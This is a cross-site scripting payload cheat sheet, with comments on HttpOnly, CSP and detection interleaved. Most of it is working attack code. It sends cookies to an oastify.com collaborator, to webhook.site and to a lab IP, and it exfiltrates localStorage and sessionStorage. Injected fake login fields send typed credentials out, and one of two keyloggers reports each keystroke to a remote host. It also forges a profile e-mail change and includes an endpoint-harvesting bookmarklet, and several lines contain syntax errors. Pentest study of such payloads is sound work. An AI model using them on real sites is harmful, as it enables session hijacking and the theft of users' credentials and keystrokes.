Payloads
(OWASP)
In modern HTML (HTML5), the `/` at the end of a self-closing tag is optional, but in XHTML it is required.
<!-- Parsed as plain HTML, the src attribute below is a literal string: the
     '+document.cookie+' part is not evaluated by the HTML parser.
     Image loads are governed by the CSP img-src directive, and document.cookie
     never contains cookies that were set with the HttpOnly attribute. -->
<img src="http://localhost?c='+document.cookie+'" />
// Sends document.cookie, unencoded, in the query string of a request to localhost.
// document.cookie only returns cookies that lack the HttpOnly attribute, so session
// cookies set with HttpOnly are not exposed to this read. fetch() destinations are
// governed by the CSP connect-src directive.
fetch("http://localhost?c="+document.cookie);
// collaborator payload
<!-- POSTs document.cookie as the request body to an external oastify.com host.
     mode 'no-cors' yields an opaque response, so the request is sent without the
     receiving server having to opt in through CORS headers.
     Defences: HttpOnly on session cookies (keeps them out of document.cookie) and
     a CSP connect-src allowlist (governs where fetch may send requests). -->
<script>
fetch('https://705jjd45qk9l1pb4rhns097xgomfa5yu.oastify.com',
{
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
<!-- Creates an Image object and sets its src to a webhook.site URL with
     document.cookie appended after the "?". The browser issues this as an image
     load, so the CSP directive that governs it is img-src, not connect-src.
     HttpOnly cookies are not part of document.cookie and are not included. -->
<script>var i = new Image; i.src="https://webhook.site/094ef770-e736-4b31-a3cb-34be690ff1b9/?"+document.cookie</script>
// Read the cookies that are visible to script. Cookies set with HttpOnly are never
// included in document.cookie, which is why that attribute matters for session cookies.
let cookie = document.cookie
// URL-encode the value so it travels as a single query parameter
let encodedCookie = encodeURIComponent(cookie)
// GET request carrying the encoded cookie string to 192.168.45.214 (a private-range
// address, presumably a lab host). The value sits in the URL, so it is visible in
// proxy and web-server logs; a CSP connect-src allowlist that does not list this
// host blocks the request.
fetch("http://192.168.45.214/exfil?data=" + encodedCookie)
// Builds a username/password pair of <input> elements from script and adds them to
// the page. None of this runs unless script injection has already succeeded, so the
// fix belongs upstream: contextual output encoding and a CSP that disallows inline
// and unlisted scripts.
// create the input elements
let usernameField = document.createElement("input")
usernameField.type = "text"
usernameField.name = "username"
usernameField.id = "username"
let passwordField = document.createElement("input")
passwordField.type = "password"
passwordField.name = "password"
passwordField.id = "password"
// append the elements to the body of the page
document.body.appendChild(usernameField)
document.body.appendChild(passwordField)
// One second after the script runs, read both fields once and write their values to
// the console. Nothing is sent over the network in this snippet.
setTimeout(function() {
console.log("Username:", document.getElementById("username").value)
console.log("Password:", document.getElementById("password").value)
}, 1000);
// Variant of the injected-form snippet: two inputs are appended to <body> and their
// values are sent in a GET request after five seconds.
// take the first <body> element of the document
let body = document.getElementsByTagName("body")[0]
// create the username element
var u = document.createElement("input");
u.type = "text";
u.style.position = "fixed";
//u.style.opacity = "0";
// create the password element
var p = document.createElement("input");
p.type = "password";
// NOTE(review): this repeats the assignment on u; p itself is not styled here
u.style.position = "fixed";
//u.style.opacity = "0";
// append elements to the body
body.append(u)
body.append(p)
// After 5 seconds both values are concatenated as-is into the query string of an
// http:// URL, so whatever was typed is visible in cleartext to proxies and server
// logs. For a defender that is a detection point: a request to an unexpected host
// carrying u= and p= parameters. A CSP connect-src allowlist that does not list the
// host blocks the request.
setTimeout(function(){
fetch("http://192.168.45.214/k?u=" + u.value + "&p=" + p.value)
}, 5000);
// Serialises every key/value pair in localStorage to a JSON string.
// Web storage has no HttpOnly equivalent: any script running on the origin can read
// it, which is the reason not to keep session tokens or other secrets there.
let data = JSON.stringify(localStorage)
// NOTE(review): "-" is presumably a typo for "="; as written this line does not parse.
let encodedData - encodeURIComponent(data)
// GET request with the encoded blob in the query string; <attackerIP> is a placeholder.
fetch("http://<attackerIP>/exfil?data=" + encodedData)
// Serialises every key/value pair in sessionStorage to a JSON string.
// sessionStorage is scoped to the tab but is still readable by any script running on
// the origin, so it is no safer than localStorage for tokens once script injection
// has succeeded.
let data = JSON.stringify(sessionStorage)
// NOTE(review): "-" is presumably a typo for "="; as written this line does not parse.
let encodedData - encodeURIComponent(data)
// GET request with the encoded blob in the query string; <attackerIP> is a placeholder.
fetch("http://<attackerIP>/exfil?data=" + encodedData)
// Sends a form-encoded POST that sets the profile e-mail address. When script runs
// inside the application's own origin, the browser attaches the user's session
// cookies to a same-origin request like this, so HttpOnly does not help here.
// The server-side control is to require the current password (or another
// re-authentication step) before an e-mail change is accepted.
// NOTE(review): http://localhost is presumably a stand-in for the application's host.
let xhr = new XMLHttpRequest();
// third argument true = asynchronous request
xhr.open('POST','http://localhost/updateprofile',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
// NOTE(review): the string is closed with a typographic quote (’) rather than ', so
// this line does not parse as written.
xhr.send('email=updated@email.com’);
// Page-wide keypress handler that converts each event's key code to a character and
// prints it to the console. Nothing leaves the browser in this snippet.
document.onkeypress = function(e) {
// get and key are assigned without let/const/var, so they become implicit globals
// (the assignments throw a ReferenceError in strict mode)
get = window.event ? event : e
// keyCode and charCode are deprecated event properties; use whichever is non-zero
key = get.keyCode ? get.keyCode : get.charCode
key = String.fromCharCode(key)
console.log(key)
}
/**
 * keydown callback: sends the pressed key's name (event.key) in the query string of
 * a GET request to 192.168.45.214.
 * That is one outbound request per key press, which stands out in proxy logs as a
 * burst of near-identical requests to a single host; a CSP connect-src allowlist
 * that does not list the host blocks them.
 * @param {KeyboardEvent} event - the keydown event delivered by the browser
 */
function logKey(event){
fetch("http://192.168.45.214/k?key=" + event.key)
}
// register the callback for every keydown on the document
document.addEventListener('keydown', logKey);
// Plain GET to a fixed URL; the response is not read. fetch() destinations are
// governed by the CSP connect-src directive.
// NOTE(review): the closing quote is a typographic ’ rather than ', so this line does
// not parse as written.
fetch('http://localhost/endpoint’)
<!-- Markup that makes the browser contact http://localhost/file when it is rendered:
     an image load (1st tag), a navigation from an onerror handler (3rd tag) and an
     external script include (4th tag). In the 2nd tag the onerror value is a bare
     URL, which as JavaScript is a label followed by a line comment, so that handler
     does nothing after the failed load of 'x'.
     Relevant CSP directives: img-src for the image loads; script-src for the external
     script and for inline event handlers, which are blocked unless 'unsafe-inline'
     or 'unsafe-hashes' is allowed. -->
<img src='http://localhost/file' />
<img src='x' onerror='http://localhost/file' />
<img src="x" onerror="window.location.href='http://localhost/file'">
<script src='http://localhost/file'></script>
// Bookmarklet (a javascript: URL with spaces written as %20). It fetches every
// external script referenced by the current page, runs a regex intended to match
// quoted path-like strings over each script body and over the page's outerHTML,
// collects the unique matches in a Set, and after 3 seconds writes the list into the
// document with document.write.
// Takeaway for defenders: routes referenced in client-side JavaScript are
// discoverable this way, so unlinked endpoints still need server-side authentication
// and authorisation.
// NOTE(review): the regex literal looks as if it lost its backslash escapes in
// extraction (the "/" inside the pattern is unescaped); compare with the original
// before relying on it.
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))/g;const%20results=new%20Set;for(var%20i=0;i<scripts.length;i++){var%20t=scripts[i].src;""!=t&&fetch(t).then(function(t){return%20t.text()}).then(function(t){var%20e=t.matchAll(regex);for(let%20r%20of%20e)results.add(r[0])}).catch(function(t){console.log("An%20error%20occurred:%20",t)})}var%20pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const%20match%20of%20matches)results.add(match[0]);function%20writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();